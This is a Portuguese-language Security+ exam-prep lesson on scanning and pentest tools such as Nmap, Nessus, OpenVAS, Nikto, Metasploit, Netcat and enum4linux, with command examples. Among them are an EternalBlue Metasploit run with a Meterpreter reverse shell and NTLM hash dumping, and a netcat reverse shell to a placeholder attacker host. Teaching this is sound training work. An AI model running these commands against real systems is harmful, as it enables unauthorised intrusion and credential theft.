0Pricing
Security+ Academy · Aula

Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap

Adquira familiaridade prática com ferramentas padrão do setor para descoberta de hosts, verificação de portas e identificação de vulnerabilidades.

Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap é uma aula grátis de Security+ Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Security+ Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Security+ Academy inclui 4 aulas no total.

O Ecossistema de Ferramentas de Varredura

Os profissionais de Security usam diversas ferramentas de varredura para diferentes finalidades: descoberta de hosts, varredura de portas, enumeração de serviços, detecção do sistema operacional, identificação de vulnerabilidades e testes de aplicações web. O Security+ espera que você conheça as ferramentas mais usadas em cada categoria. Entender o que cada ferramenta faz — e o que ela não consegue fazer — ajuda você a selecionar a ferramenta certa para cada tarefa e interpretar os resultados corretamente. Os resultados de várias ferramentas complementares fornecem uma cobertura mais completa do que qualquer ferramenta isolada.

Nmap: o Mapeador de Redes

Nmap (Network Mapper) é a ferramenta de código aberto mais usada para descoberta de redes e auditoria de Security. Ela pode descobrir hosts ativos, enumerar portas abertas, detectar serviços em execução e suas versões e identificar o sistema operacional. O Nmap usa várias técnicas de varredura, incluindo a varredura SYN (o padrão, rápida e relativamente discreta), o TCP Connect (handshake completo, mais ruidoso, mas que não exige root), a varredura UDP e a varredura de versão. Ele vem com o Nmap Scripting Engine (NSE), que fornece centenas de scripts para detecção de vulnerabilidades, ataques de força bruta e exploração.

# Common Nmap scan types:
nmap -sS 192.168.1.0/24          # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10            # TCP connect scan
nmap -sU -p 53,67,161 target     # UDP scan specific ports
nmap -sV 192.168.1.10            # version detection
nmap -O 192.168.1.10             # OS detection
nmap -A 192.168.1.10             # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10            # scan all 65535 ports
nmap --script vuln 192.168.1.10  # run vulnerability scripts

Saída e Interpretação do Nmap

Interpretar corretamente a saída do Nmap é uma habilidade essencial. Cada linha representa uma porta com seu estado (aberta: o serviço está escutando; fechada: o host respondeu, mas nada está escutando; filtrada: não houve resposta ou o ICMP está inacessível, provavelmente devido a um firewall), o protocolo e o serviço/versão detectado. Portas abertas representam uma possível superfície de ataque. Portas abertas inesperadas em um host podem indicar comprometimento ou serviços não autorizados. As opções -oN, -oX e -oG salvam a saída nos formatos normal, XML e analisável pelo grep — salvar a saída é fundamental para a documentação e a comparação entre varreduras ao longo do tempo.

# Sample Nmap output:
# PORT     STATE SERVICE  VERSION
# 22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu
# 80/tcp   open  http     Apache 2.4.41
# 443/tcp  open  ssl/http Apache 2.4.41
# 8080/tcp open  http     Jetty 9.4.39
# 3306/tcp open  mysql    MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)

# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xml

Nessus: Scanner Empresarial de Vulnerabilidades

Nessus (da Tenable) é o scanner comercial de vulnerabilidades mais amplamente implantado. Ele usa uma arquitetura de plugins com mais de 100.000 plugins que abrangem CVEs, verificações de configuração, referências de conformidade (CIS, DISA STIG) e detecção de malware. O Nessus realiza varreduras com Credentials fazendo login nos sistemas com as Credentials fornecidas para inspecionar versões de softwares instalados, chaves do registro e arquivos de configuração — produzindo resultados muito mais precisos do que a sondagem de rede sem Credentials. O Nessus produz relatórios detalhados com pontuações CVSS, descrições de vulnerabilidades e recomendações de correção. A versão gratuita Nessus Essentials faz a varredura de até 16 IPs.

# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)

# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High     (CVSS 7.0-8.9):  privilege escalation, severe data exposure
# Medium   (CVSS 4.0-6.9):  local privilege escalation, information disclosure
# Low      (CVSS 0.1-3.9):  minimal impact, hardening issues
# Info:    configuration data, no immediate risk

OpenVAS: Varredura de Vulnerabilidades de Código Aberto

OpenVAS (Open Vulnerability Assessment System) é um scanner de vulnerabilidades gratuito e de código aberto mantido pela Greenbone Networks. Ele é o fork mantido pela comunidade do Nessus original, antes de este se tornar comercial. O OpenVAS usa NVTs (Network Vulnerability Tests) análogos aos plugins do Nessus. A Greenbone Community Edition (GCE) fornece uma interface de gerenciamento baseada na web (Greenbone Security Assistant). O OpenVAS é popular em ambientes nos quais os custos de licenciamento impedem o uso de ferramentas comerciais. Ele possui um conjunto de recursos mais amplo que o Nmap e continua gratuito, sendo uma escolha comum para organizações menores, ambientes acadêmicos e laboratórios de Security.

# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup    # initial setup (takes time to download feeds)
gvm-start    # start OpenVAS services

# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report

# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."

Nikto: Scanner de Vulnerabilidades de Servidores Web

Nikto é um scanner de servidores web de código aberto que verifica arquivos perigosos, versões desatualizadas de software, problemas de configuração do servidor e vulnerabilidades web comuns. Ele testa mais de 6.700 problemas conhecidos, incluindo métodos HTTP inseguros, cabeçalhos de Security ausentes, interfaces administrativas expostas, Credentials padrão e vulnerabilidades CGI comuns. O Nikto é ruidoso e não foi projetado para ser discreto — ele gera uma quantidade significativa de registros no alvo. Ele complementa os scanners de nível de rede ao fornecer verificações específicas para a web que o Nessus e o OpenVAS talvez não cubram em profundidade. Use sempre o Nikto somente em sistemas nos quais você tenha autorização para realizar testes.

# Nikto web scan examples:
nikto -h 192.168.1.10                    # basic scan
nikto -h https://192.168.1.10            # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443      # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html  # save report

# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)

Metasploit Framework

O Metasploit Framework é a plataforma de testes de penetração mais usada, fornecendo um banco de dados de explorações, cargas úteis, módulos auxiliares e ferramentas pós-exploração. Os candidatos ao Security+ devem entender o que é o Metasploit e como ele se encaixa em um teste de penetração, mesmo que nunca o tenham usado. Os módulos do Metasploit incluem: explorações (código que tira proveito de uma vulnerabilidade), cargas úteis (shellcode executado após uma exploração bem-sucedida, como o Meterpreter), módulos auxiliares (varredura, fuzzing e enumeração sem exploração) e módulos pós-exploração (para escalação de privilégios, extração de Credentials e movimentação lateral após o acesso inicial).

# Metasploit Framework basic workflow:
msfconsole                          # start Metasploit
search eternalblue                  # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info                               # show exploit details
set RHOSTS 192.168.1.10            # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5              # attacker IP
run                                # execute exploit

# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump              # dump NTLM hashes

Netcat: o Canivete Suíço

Netcat (nc) é um utilitário simples, mas versátil, que lê e grava dados em conexões de rede usando TCP ou UDP. Ele tem inúmeras aplicações em atividades de Security: estabelecer shells reversos a partir de Hosts comprometidos, transferir arquivos entre segmentos de rede, realizar varredura de portas, criar ouvintes de rede simples para testes e capturar banners para identificar versões de serviços. Sua simplicidade e disponibilidade em praticamente todos os sistemas Linux fazem dele uma ferramenta frequentemente usada tanto na administração legítima quanto nos conjuntos de ferramentas de Attacker, tornando-o também uma ferramenta importante para compreender sob a perspectiva da detecção.

# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22    # grab SSH banner
nc -v 192.168.1.10 80    # grab HTTP banner

# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded

# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash

# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender:   nc receiver_ip 9999 < file.txt

Ferramentas de Recon-ng e OSINT

Recon-ng é uma estrutura de reconhecimento na Web projetada para coletar OSINT (inteligência de fontes abertas). Ela usa módulos que consultam fontes públicas — Shodan, Bing, HaveIBeenPwned, registros de DNS, LinkedIn, WHOIS e logs de transparência de Certificate — para coletar informações sobre um Target antes do início de qualquer Scanning ativo. A fase de Reconnaissance de um teste de intrusão normalmente começa com OSINT para criar uma visão da topologia de rede do Target, dos nomes dos funcionários, dos formatos de e-mail, das tecnologias usadas e dos ativos expostos publicamente. Um bom OSINT pode revelar caminhos de ataque que demorariam muito mais para ser encontrados apenas por meio de Scanning ativo.

# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com

# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com

# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'

# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin

# 5. Certificate transparency:
crt.sh/?q=%.example.com  (reveals subdomains via certs)

Enumeração de rede com Enum4linux

Enum4linux enumera informações de Hosts Windows e servidores Samba (SMB do Linux) usando sessões nulas e MSRPC. Ele extrai nomes de usuários, associações a grupos, compartilhamentos, políticas de senha e informações do grupo de trabalho. Durante testes de intrusão internos, enum4linux pode revelar rapidamente as contas de usuário disponíveis para pulverização de senhas e a estrutura de compartilhamentos de um ambiente. As versões modernas do Windows restringem o acesso por sessão nula por padrão, mas ambientes mal configurados frequentemente expõem uma quantidade significativa de informações. Recursos semelhantes estão disponíveis no samrdump.py do Impacket e no CrackMapExec para enumeração autenticada.

# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10       # all enumeration
enum4linux -U 192.168.1.10       # users only
enum4linux -S 192.168.1.10       # shares only

# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares

# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10

Como selecionar a ferramenta certa para cada tarefa

Profissionais de Security associam as ferramentas às tarefas. Para descoberta de Hosts e Scanning de portas: Nmap. Para identificação de Vulnerability em larga escala: Nessus (comercial) ou OpenVAS (gratuito). Para Vulnerability de servidores Web: Nikto. Para ataques a aplicações Web: Burp Suite. Para Exploitation: Metasploit. Para Reconnaissance de OSINT: Recon-ng, theHarvester, Shodan. Para análise de tráfego de rede: Wireshark, tcpdump. Para ataques sem fio: conjunto Aircrack-ng. O exame Security+ testa o conhecimento conceitual dessas ferramentas — você deve saber para que cada uma é usada, mesmo sem experiência prática com todas elas.

Verificação rápida

Teste sua compreensão dos conceitos do CompTIA Security+ (SY0-701) apresentados nesta lição.

Recapitulação da lição

Nesta lição, você aprendeu que o Nmap é a base para descoberta de Hosts, Scanning de portas e detecção de versões, com um mecanismo avançado de scripts para recursos adicionais; que o Nessus e o OpenVAS realizam Scanning abrangente de Vulnerability contra CVEs conhecidas, usando acesso com credenciais para obter a maior precisão; e que o Metasploit fornece uma estrutura de Exploitation para que profissionais de testes de intrusão confirmem se as Vulnerability são realmente exploráveis e demonstrem o Impacto real de um ataque. A seguir, exploraremos o ciclo de vida completo dos testes de intrusão, desde a Reconnaissance até o Reporting.

Perguntas Frequentes

A aula “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap” é grátis?

Sim — o texto completo de “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Security+ Academy, atualize para CoddyKit PRO. O curso de Security+ Academy inclui 4 aulas no total.

O que vou aprender em “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap”?

Adquira familiaridade prática com ferramentas padrão do setor para descoberta de hosts, verificação de portas e identificação de vulnerabilidades. Você pratica Security+ Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Security+ Academy?

Nenhuma experiência prévia é necessária. Security+ Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.

Quanto tempo leva a aula “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Security+ Academy?

Sim. Cada aula de Security+ Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Verificação de vulnerabilidades versus testes de intrusão
  2. Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap
  3. Fases do teste de intrusão: do reconhecimento ao relatório
  4. Pontuação CVSS e priorização de vulnerabilidades
← Voltar para Security+ Academy